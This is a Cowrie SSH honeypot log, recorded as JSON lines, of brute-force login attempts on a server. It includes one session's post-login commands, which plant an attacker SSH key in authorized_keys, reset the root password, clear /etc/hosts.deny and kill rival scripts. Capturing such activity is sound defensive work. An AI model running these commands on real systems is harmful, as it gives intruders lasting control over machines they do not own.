{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:51:50.533714Z","src_ip":"157.20.207.165","session":"010c01c903db"}
{"eventid":"cowrie.session.connect","src_ip":"157.20.207.165","src_port":52730,"dst_ip":"1.2.3.4","dst_port":22,"session":"59fd4707348e","protocol":"ssh","message":"New connection: 157.20.207.165:52730 (1.2.3.4:22) [session: 59fd4707348e]","sensor":"my-vps","timestamp":"2025-09-09T06:51:50.716725Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:51:50.717616Z","src_ip":"157.20.207.165","session":"59fd4707348e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:51:50.900943Z","src_ip":"157.20.207.165","session":"59fd4707348e"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T06:51:51.762599Z","src_ip":"157.20.207.165","session":"59fd4707348e"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:51:52.949285Z","src_ip":"157.20.207.165","session":"59fd4707348e"}
{"eventid":"cowrie.session.connect","src_ip":"157.20.207.165","src_port":36540,"dst_ip":"1.2.3.4","dst_port":22,"session":"f9cc9e5380fd","protocol":"ssh","message":"New connection: 157.20.207.165:36540 (1.2.3.4:22) [session: f9cc9e5380fd]","sensor":"my-vps","timestamp":"2025-09-09T06:51:53.130698Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:51:53.131492Z","src_ip":"157.20.207.165","session":"f9cc9e5380fd"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:51:53.315734Z","src_ip":"157.20.207.165","session":"f9cc9e5380fd"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:51:54.092867Z","src_ip":"157.20.207.165","session":"f9cc9e5380fd"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:51:54.277351Z","src_ip":"157.20.207.165","session":"f9cc9e5380fd"}
{"eventid":"cowrie.session.closed","duration":"5.9","message":"Connection lost after 5.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:51:54.278188Z","src_ip":"157.20.207.165","session":"010c01c903db"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57630,"dst_ip":"1.2.3.4","dst_port":22,"session":"080d3e329106","protocol":"ssh","message":"New connection: 212.227.235.229:57630 (1.2.3.4:22) [session: 080d3e329106]","sensor":"my-vps","timestamp":"2025-09-09T06:51:54.511938Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:51:54.512547Z","src_ip":"212.227.235.229","session":"080d3e329106"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:51:54.627826Z","src_ip":"212.227.235.229","session":"080d3e329106"}
{"eventid":"cowrie.login.failed","username":"hunter","password":"hunter","message":"login attempt [hunter/hunter] failed","sensor":"my-vps","timestamp":"2025-09-09T06:51:55.131078Z","src_ip":"212.227.235.229","session":"080d3e329106"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:51:56.249634Z","src_ip":"212.227.235.229","session":"080d3e329106"}
{"eventid":"cowrie.session.connect","src_ip":"118.26.39.178","src_port":58270,"dst_ip":"1.2.3.4","dst_port":22,"session":"5aef818693b4","protocol":"ssh","message":"New connection: 118.26.39.178:58270 (1.2.3.4:22) [session: 5aef818693b4]","sensor":"my-vps","timestamp":"2025-09-09T06:52:10.748674Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:52:10.749777Z","src_ip":"118.26.39.178","session":"5aef818693b4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:52:10.950852Z","src_ip":"118.26.39.178","session":"5aef818693b4"}
{"eventid":"cowrie.login.success","username":"root","password":"P@$$w0rd","message":"login attempt [root/P@$$w0rd] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:52:11.779913Z","src_ip":"118.26.39.178","session":"5aef818693b4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:52:12.237680Z","src_ip":"118.26.39.178","session":"5aef818693b4"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:52:12.238477Z","src_ip":"118.26.39.178","session":"5aef818693b4"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:52:12.239894Z","src_ip":"118.26.39.178","session":"5aef818693b4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:52:12.440800Z","src_ip":"118.26.39.178","session":"5aef818693b4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:52:12.911427Z","src_ip":"118.26.39.178","session":"5aef818693b4"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T06:52:12.912207Z","src_ip":"118.26.39.178","session":"5aef818693b4"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T06:52:13.115562Z","src_ip":"118.26.39.178","session":"5aef818693b4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:52:13.116469Z","src_ip":"118.26.39.178","session":"5aef818693b4"}
{"eventid":"cowrie.session.connect","src_ip":"118.26.39.178","src_port":58272,"dst_ip":"1.2.3.4","dst_port":22,"session":"0077cda53e55","protocol":"ssh","message":"New connection: 118.26.39.178:58272 (1.2.3.4:22) [session: 0077cda53e55]","sensor":"my-vps","timestamp":"2025-09-09T06:52:13.319674Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:52:13.320460Z","src_ip":"118.26.39.178","session":"0077cda53e55"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:52:13.521791Z","src_ip":"118.26.39.178","session":"0077cda53e55"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":32770,"dst_ip":"1.2.3.4","dst_port":22,"session":"12d0f85766dc","protocol":"ssh","message":"New connection: 212.227.235.229:32770 (1.2.3.4:22) [session: 12d0f85766dc]","sensor":"my-vps","timestamp":"2025-09-09T06:52:13.992498Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:52:13.993263Z","src_ip":"212.227.235.229","session":"12d0f85766dc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:52:14.238172Z","src_ip":"212.227.235.229","session":"12d0f85766dc"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T06:52:14.358821Z","src_ip":"118.26.39.178","session":"0077cda53e55"}
{"eventid":"cowrie.login.failed","username":"boris","password":"boris2025","message":"login attempt [boris/boris2025] failed","sensor":"my-vps","timestamp":"2025-09-09T06:52:15.256837Z","src_ip":"212.227.235.229","session":"12d0f85766dc"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:52:15.559644Z","src_ip":"118.26.39.178","session":"0077cda53e55"}
{"eventid":"cowrie.session.connect","src_ip":"118.26.39.178","src_port":58278,"dst_ip":"1.2.3.4","dst_port":22,"session":"94920ca9dc7c","protocol":"ssh","message":"New connection: 118.26.39.178:58278 (1.2.3.4:22) [session: 94920ca9dc7c]","sensor":"my-vps","timestamp":"2025-09-09T06:52:15.873821Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:52:15.874725Z","src_ip":"118.26.39.178","session":"94920ca9dc7c"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:52:16.503751Z","src_ip":"212.227.235.229","session":"12d0f85766dc"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:52:21.780409Z","src_ip":"118.26.39.178","session":"5aef818693b4"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep name | wc -l","message":"CMD: cat /proc/cpuinfo | grep name | wc -l","sensor":"my-vps","timestamp":"2025-09-09T06:52:21.781084Z","src_ip":"118.26.39.178","session":"5aef818693b4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:52:21.879381Z","src_ip":"118.26.39.178","session":"94920ca9dc7c"}
{"eventid":"cowrie.session.closed","duration":"6.0","message":"Connection lost after 6.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:52:21.881181Z","src_ip":"118.26.39.178","session":"94920ca9dc7c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99","size":2,"shasum":"3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:52:21.978985Z","src_ip":"118.26.39.178","session":"5aef818693b4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:52:22.476813Z","src_ip":"118.26.39.178","session":"5aef818693b4"}
{"eventid":"cowrie.command.input","input":"echo \"root:U8uvuJ3DvJmW\"|chpasswd|bash","message":"CMD: echo \"root:U8uvuJ3DvJmW\"|chpasswd|bash","sensor":"my-vps","timestamp":"2025-09-09T06:52:22.477525Z","src_ip":"118.26.39.178","session":"5aef818693b4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/d650358360fb0b798daf1f48ecdeee22812d1f1c8f87cc55e9682fddb111bd14","size":21,"shasum":"d650358360fb0b798daf1f48ecdeee22812d1f1c8f87cc55e9682fddb111bd14","duplicate":false,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/d650358360fb0b798daf1f48ecdeee22812d1f1c8f87cc55e9682fddb111bd14 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:52:22.677050Z","src_ip":"118.26.39.178","session":"5aef818693b4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:52:23.130750Z","src_ip":"118.26.39.178","session":"5aef818693b4"}
{"eventid":"cowrie.command.input","input":"rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;","message":"CMD: rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;","sensor":"my-vps","timestamp":"2025-09-09T06:52:23.131456Z","src_ip":"118.26.39.178","session":"5aef818693b4"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","shasum":"01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","destfile":"/etc/hosts.deny","message":"Saved redir contents with SHA-256 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b to var/lib/cowrie/downloads/01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","sensor":"my-vps","timestamp":"2025-09-09T06:52:23.332268Z","src_ip":"118.26.39.178","session":"5aef818693b4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a","size":0,"shasum":"a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:52:23.333184Z","src_ip":"118.26.39.178","session":"5aef818693b4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:52:23.831774Z","src_ip":"118.26.39.178","session":"5aef818693b4"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'","message":"CMD: cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'","sensor":"my-vps","timestamp":"2025-09-09T06:52:23.832466Z","src_ip":"118.26.39.178","session":"5aef818693b4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe","size":35,"shasum":"95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:52:24.038286Z","src_ip":"118.26.39.178","session":"5aef818693b4"}
